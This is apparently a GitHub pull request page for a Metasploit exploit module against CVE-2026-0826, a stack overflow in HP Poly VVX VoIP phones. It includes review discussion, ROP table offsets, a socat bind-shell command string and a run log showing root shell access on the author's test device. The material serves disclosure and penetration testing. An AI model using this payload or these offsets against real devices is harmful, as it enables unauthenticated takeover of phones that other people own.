Exploit module for HP Poly VVX (CVE-2026-0826)#21525
Open
sfewer-r7 wants to merge 7 commits into
Open
Conversation
jvoisin
reviewed
Jun 2, 2026
| def get_vvx_rop_table(version_str) | ||
| rop_tables = { | ||
| '6.4.7.4477' => { | ||
| # Even though /proc/sys/kernel/randomize_va_space is 1, all libraries are |
Contributor
There was a problem hiding this comment.
Now I'm curious as to why ASLR doesn't work :D
Contributor
Author
There was a problem hiding this comment.
So am I. The SO libraries like libc-2.8.so are compiled with PIE so I expected them to be randomized per-boot, but that never happened. I spent some time looking at the kernel to see if something obvious was present, but I want not able to identify the cause.
adfoster-r7
reviewed
Jun 4, 2026
| disconnect_udp | ||
| end | ||
|
|
||
| def get_version |
Contributor
There was a problem hiding this comment.
If we want to cache it
Suggested change
| def get_version | |
| def get_version | |
| @version ||= _get_version | |
| end | |
| def _get_version |
Contributor
There was a problem hiding this comment.
Pull request overview
Adds a new Metasploit exploit module targeting HP Poly VVX/Trio VoIP devices vulnerable to CVE-2026-0826, along with a new socat-based bind TCP command payload and corresponding module documentation.
Changes:
- Introduces
exploit/linux/misc/poly_unauth_rce_cve_2026_0826(UDP/SIP SDP ICE attribute overflow with VVX 450 ROP table for 6.4.7.4477). - Adds a new
cmd/unix/bind_socat_tcppayload intended to provide a socat-backed bind shell. - Adds end-user documentation for the new exploit module.
Impact Analysis:
- Blast radius: medium — new exploit/payload surfaces in module and payload catalogs; affects users selecting
cmd/unix/bind_socat_tcpand running AutoCheck on the new exploit. - Data and contract effects: low — no schema changes; new module/payload add new API surface (module/payload names/options) but do not modify existing ones.
- Rollback and test focus: rollback is straightforward (remove new files); focus validation on
checkbehavior (Safe vs Unknown), version/model detection failure paths, and verifying the bind socat payload yields a usable interactive session.
Reviewed changes
Copilot reviewed 3 out of 3 changed files in this pull request and generated 5 comments.
| File | Description |
|---|---|
| modules/payloads/singles/cmd/unix/bind_socat_tcp.rb | Adds a new socat-based bind TCP command-shell payload. |
| modules/exploits/linux/misc/poly_unauth_rce_cve_2026_0826.rb | Adds the CVE-2026-0826 unauth SIP/SDP ICE overflow exploit with a VVX 450 ROP table. |
| documentation/modules/exploit/linux/misc/poly_unauth_rce_cve_2026_0826.md | Adds operator-facing documentation and an example run for the new exploit. |
Comment on lines
+89
to
+92
| Exploit::CheckCode::Safe(description) | ||
| end | ||
|
|
||
| CheckCode::Unknown |
Contributor
Author
|
|
||
| _, model_str, version_str = get_version | ||
|
|
||
| fail_with(Failure::UnexpectedReply, 'Failed to get target version') unless version_str || model_str |
| info, | ||
| 'Name' => 'HP Poly Voice Unauthenticated Remote Code Execution', | ||
| 'Description' => %q{ | ||
| CVE-2026-0826 is a critical unauthenticated stack-based buffer overflow vulnerability affecting affect all |
| @@ -0,0 +1,87 @@ | |||
| ## Vulnerable Application | |||
| CVE-2026-0826 is a critical unauthenticated stack-based buffer overflow vulnerability affecting affect all | |||
| # Returns the command string to use for execution | ||
| # | ||
| def command_string | ||
| "#{datastore['SocatPath']} tcp-l:#{datastore['LPORT']},fork exec:'#{datastore['BashPath']}'" |
Contributor
Author
There was a problem hiding this comment.
i added a7fc1af for a bunch of improvements to this socat payload. tested to work on my HP Poly VVX 450 device. you now get an interactive login session which is nicer:
msf exploit(linux/misc/poly_unauth_rce_cve_2026_0826) > exploit
[+] /usr/local/bin/socat tcp-l:4444 exec:'/bin/sh',login,pty,stderr,setsid,sigint,sane
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Poly VVX_450 version 6.4.7.4477
[*] cmd: /usr/local/bin/socat${IFS}tcp-l:4444${IFS}exec:'/bin/sh',login,pty,stderr,setsid,sigint,sane
[*] ROP Table: {:libc_base=>1084604416, :libc_gadget1=>87124, :libc_gadget2=>1031180, :libc_system=>227784, :libc_gadget4=>941044}
[*] Started bind TCP handler against 192.168.86.80:4444
[-] The connection was refused by the remote host (192.168.86.80:4444).
[*] Command shell session 1 opened (192.168.86.122:46697 -> 192.168.86.80:4444) at 2026-06-05 12:29:36 +0100
Shell Banner:
BusyBox v1.11.1 (2018-04-20 04:23:17 IST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
-/bin/sh: can't access tty; job control turned off
#
-----
# id
id
uid=0(root) gid=0(root)
# uname -a
uname -a
Linux (none) 2.6.27.18 #1 PREEMPT Mon Jan 13 09:50:58 PST 2020 armv6l unknown
#
All the socat payloads would benefit from a review and standardization across how they operate and the advanced options they can (or cannot) accept.
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
…allows one to be nil and can lead to NoMethodError on model_str.downcase or a nil ROP lookup. Impact: exploit can crash instead of failing cleanly when version detection is partial. Fix: require both values to be present. (Thanks Copilot)
… the vendor advisory. I dont have a Poly trio device to test, but Recog has user agents strings we can use for the regex when pulling out the model and version info.
…l, avoids the encoding issue for the hp pole module (leverages pty and login instead of " -li"), does not fork (which is inline with other socat payloads).
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
Overview
This pull request adds an exploit module for CVE-2026-0826, an unauthenticated stack based buffer overflow affecting every model in the HP Poly VVX series, and the HP Poly Trio series of VoIP devices when they have the non-default ICE feature enabled. For more information on the vuln, see our Rapid7 disclosure blog or the vendor advisory.
The module currently supports a VVX 450 device with ROP gadgets for one recent version (
6.4.7.4477), as that's what I have to test against.The device is a minimal embedded Linux system, and getting a payload to work was a pain. I could only leverage socat based payloads, and specifically I added a new
cmd/unix/bind_socat_tcppayload which is verified to work.Example